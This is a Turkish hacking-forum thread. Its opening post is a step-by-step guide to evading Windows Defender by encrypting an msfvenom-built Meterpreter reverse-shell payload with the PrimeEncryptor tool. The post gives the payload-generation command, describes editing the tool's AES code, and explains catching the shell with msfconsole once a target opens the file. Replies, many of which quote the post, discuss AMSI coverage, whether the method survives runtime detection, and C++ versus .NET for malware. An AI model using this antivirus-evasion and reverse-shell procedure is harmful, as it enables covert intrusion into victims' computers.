Windows Defender Bypass

[Slayer911]

Merhaba, bugün sizlere PrimeEncryptor aracını kullanarak Windows Defender'ı nasıl aşabileceğinizi göstereceğim.
Hazırsanız başlayalım

Öncelikle aracı sanal makinemize kuralım.

Dosyanın içerisine girerek CodeSnippets içerisindeki AES dosyasını PrimeEncryptor'a kopyalıyoruz.

Daha sonra MsfVenom aracını kullanarak bir arka kapı dosyası oluşturuyoruz.

Payload üretmek için kullanılan komut ---> msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<LOCAL HOST> LPORT=4444 -f raw > payload.bin

AES.cpp dosyasında bazı değişiklikler yapmamız gerekiyor, bu yüzden dosyayı açıp değişiklikleri yapıyoruz.

İlk yorum kısmını silin ve altındaki diğer yorum kısmını yorumdan kaldırın.

ilk bölüm (bölümü sil)

Yorumun içindeki yorum kısmını kaldır.

Daha sonra Kaydedip Çıkın.
Python kodunu çalıştırdığımızda açılan kodda bize verilen kodları çalıştıralım.

Çerçevelediğimiz yeri kopyalayıp terminale yapıştırıyoruz

ip ve portu dinlemek için msfconsol kullanıcaz.

Hedef sistemdeki kişi dosyamızı açtığı zaman, shell bize geliyor.

Windows Defender tehdit hakkında herhangi bir uyarı vermez. Bu şekilde Windows Defender'ı atlatırız

Okuduğunuz için teşekkür ederim.

 

[slowbaskan123]

Merhaba, bugün sizlere PrimeEncryptor aracını kullanarak Windows Defender'ı nasıl aşabileceğinizi göstereceğim.
Hazırsanız başlayalım

Öncelikle aracı sanal makinemize kuralım.

Dosyanın içerisine girerek CodeSnippets içerisindeki AES dosyasını PrimeEncryptor'a kopyalıyoruz.

Daha sonra MsfVenom aracını kullanarak bir arka kapı dosyası oluşturuyoruz.

Payload üretmek için kullanılan komut ---> msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<LOCAL HOST> LPORT=4444 -f raw > payload.bin

AES.cpp dosyasında bazı değişiklikler yapmamız gerekiyor, bu yüzden dosyayı açıp değişiklikleri yapıyoruz.

İlk yorum kısmını silin ve altındaki diğer yorum kısmını yorumdan kaldırın.

ilk bölüm (bölümü sil)

Yorumun içindeki yorum kısmını kaldır.

Daha sonra Kaydedip Çıkın.
Python kodunu çalıştırdığımızda açılan kodda bize verilen kodları çalıştıralım.

Çerçevelediğimiz yeri kopyalayıp terminale yapıştırıyoruz

ip ve portu dinlemek için msfconsol kullanıcaz.

Hedef sistemdeki kişi dosyamızı açtığı zaman, shell bize geliyor.

Windows Defender tehdit hakkında herhangi bir uyarı vermez. Bu şekilde Windows Defender'ı atlatırız

Okuduğunuz için teşekkür ederim.

Merhaba,

Öncelikle konu güzel fakat sorun Runtime geçmiyor bu araç bildiğim kadarıyla.
Defender; AMSI entegrasyonu bulunan bir AV, Dinamik analizde yakalayacaktır. Başlangıç için güzel konu, eline sağlık.

 

[3jd3rh4ck3r]

Eline sağlık

 

[Loopenx]

Elinize emeğinize sağlık

 

[Kurt_44]

Eline sağlık

 

[Slayer911]

Merhaba,

Öncelikle konu güzel fakat sorun Runtime geçmiyor bu araç bildiğim kadarıyla.
Defender; AMSI entegrasyonu bulunan bir AV, Dinamik analizde yakalayacaktır. Başlangıç için güzel konu, eline sağlık.

Yorumunuz için teşekkür ederim.

Bu bypass tekniğini kendiniz test ettiniz mi? Eğer denediyseniz, hangi ortamda ve ne tür bir sorunla karşılaştığınızı paylaşırsanız çok memnun olurum. Böylece geliştirmeler yapmam da daha kolay olur.

 

[Bozkurtlum]

Eline Sağlık Yararlı.

 

[Jusstthe]

Yorumunuz için teşekkür ederim.

Bu bypass tekniğini kendiniz test ettiniz mi? Eğer denediyseniz, hangi ortamda ve ne tür bir sorunla karşılaştığınızı paylaşırsanız çok memnun olurum. Böylece geliştirmeler yapmam da daha kolay olur.

Senin durumunda gerekmiyor, AMSI her bileşen için devreye girmiyor

What applications are designed to send content to AMSI?​

The following applications automatically opt in to AMSI content scanning if supported:

• PowerShell: instrumented in System.Management.Automation.dll
• VBScript: instrumented in vbscript.dll
• JScript: instrumented in jscript.dll, jscript9.dll, and jscriptlegacy.dll
• VBA macros in Office documents: instrumented in VBE7.dll
• Excel 4.0 macros: instrumented inexcel.exe and excelcnv.exe
• Exchange Server 2016: instrumented in Microsoft.Exchange.HttpRequestFiltering.dll
• WMI: instrumented in fastprox.dll
• .NET in-memory assembly loads: instrumented in .NET 4.8+ in clr.dll and coreclr.dll
• Volume shadow copy operations: instrumented in VSSVC.exe and swprv.dll
• User Account Control (UAC) elevations: instrumented in consent.exe

 

[Captainati]

Kernel mod çalışıp winapi çağrılarını dahi hooklayan antivirüsleri bu yöntemle geçebileceğinizi sanmıyorum.

PrimeEncryptor/PrimeEncryptor.py at main · dagowda/PrimeEncryptor

Contribute to dagowda/PrimeEncryptor development by creating an account on GitHub.

github.com

Proje açık kaynak kodlu bu da tehdit istihbaratı yoluyla yöntemin public edilebileceği anlamına geliyor kısaca bugün geçer yarın duvara toslar.

 

[Slayer911]

Eline sağlık

teşekkür ederim

 

[Slayer911]

Kernel mod çalışıp winapi çağrılarını dahi hooklayan antivirüsleri bu yöntemle geçebileceğinizi sanmıyorum.

PrimeEncryptor/PrimeEncryptor.py at main · dagowda/PrimeEncryptor

Contribute to dagowda/PrimeEncryptor development by creating an account on GitHub.

github.com

Proje açık kaynak kodlu bu da tehdit istihbaratı yoluyla yöntemin public edilebileceği anlamına geliyor kısaca bugün geçer yarın duvara toslar.

Yorumun için teşekkür ederim. Dediğin gibi açık kaynak olduğu için yöntem zamanla tespit edilebilir, ama ben zaten bunu kalıcı bir çözüm olarak değil, ilgilenenler için teknik olarak faydalı olabileceğini düşündüğümden forumda paylaştım. En azından mantığını anlamak ve fikir edinmek isteyenler için yararlı olabilir.

 

[slowbaskan123]

Senin durumunda gerekmiyor, AMSI her bileşen için devreye girmiyor

Hocam C++ ile AMSI geçmek daha mı kolay diyorsun o zaman, denemek istiyorum fakat boş zaman kaybı geliyor.

 

[BlackDynamite]

Hocam C++ ile AMSI geçmek daha mı kolay diyorsun o zaman, denemek istiyorum fakat boş zaman kaybı geliyor.

Bellek yonetiminde native daha iyidir

 

[Jusstthe]

Hocam C++ ile AMSI geçmek daha mı kolay diyorsun o zaman, denemek istiyorum fakat boş zaman kaybı geliyor.

Hocam AMSI'yi genelde dotnet assembly'lerini hafızada çalıştırırken bypass edersin, AMSI her durumda çalışmıyor. Mesela bu arkadaş salt bir shellcode'unu, yani makine kodunu çalıştırdığı için gerek bile yok

Bellek yonetiminde native daha iyidir

Fark etmez

 

[BlackDynamite]

Hocam AMSI'yi genelde dotnet assembly'lerini hafızada çalıştırırken bypass edersin, AMSI her durumda çalışmıyor. Mesela bu arkadaş salt bir shellcode'unu, yani makine kodunu çalıştırdığı için gerek bile yok



Fark etmez

.net dillerinde direk makine koduna çevrilmiyor araya clr girip önce makineye yakın dile çeviriyor diye biliyorum bide native direk çevrili daha güzel çalışır

 

[Jusstthe]

.net dillerinde direk makine koduna çevrilmiyor araya clr girip önce makineye yakın dile çeviriyor diye biliyorum bide native direk çevrili daha güzel çalışır

Runtime'da CLR'nin parçası olan JIT mekanizması o intermediate kodunu makine koduna çeviriyor. Ki managed bir dilin kullanımı niye daha az güzel çalışmasına neden olsun ki

 

[Captainati]

.net dillerinde direk makine koduna çevrilmiyor araya clr girip önce makineye yakın dile çeviriyor diye biliyorum bide native direk çevrili daha güzel çalışır

Bence sizin bahsetmek istediğiniz bundan daha farklı c++ belek yönetiminde sınırsız yetki verir ama bu her zaman iyi değildir.

 

[BlackDynamite]

Bence sizin bahsetmek istediğiniz bundan daha farklı c++ belek yönetiminde sınırsız yetki verir ama bu her zaman iyi değildir.

Bide şu ozelligi çok hoş .net diller yardımcı gerekir çalıştırmak için ama o gerektirmiyor cat actiriyor pc de hiç bisey olmasa

 

[skyline34_]

Yorumunuz için teşekkür ederim.

Bu bypass tekniğini kendiniz test ettiniz mi? Eğer denediyseniz, hangi ortamda ve ne tür bir sorunla karşılaştığınızı paylaşırsanız çok memnun olurum. Böylece geliştirmeler yapmam da daha kolay olur.

dinlemeye alınmıyor

 

[Captainati]

Bide şu ozelligi çok hoş .net diller yardımcı gerekir çalıştırmak için ama o gerektirmiyor cat actiriyor pc de hiç bisey olmasa

c/c++ içinde yardımcılar gerekir tıpkı dll gibi fakat paket olarak derlenme seçeneğide sunar.
bence sizin c/c++ hakkındaki düşünceniz malware geliştirme konusunda .net dillere nazaran daha sofistik olması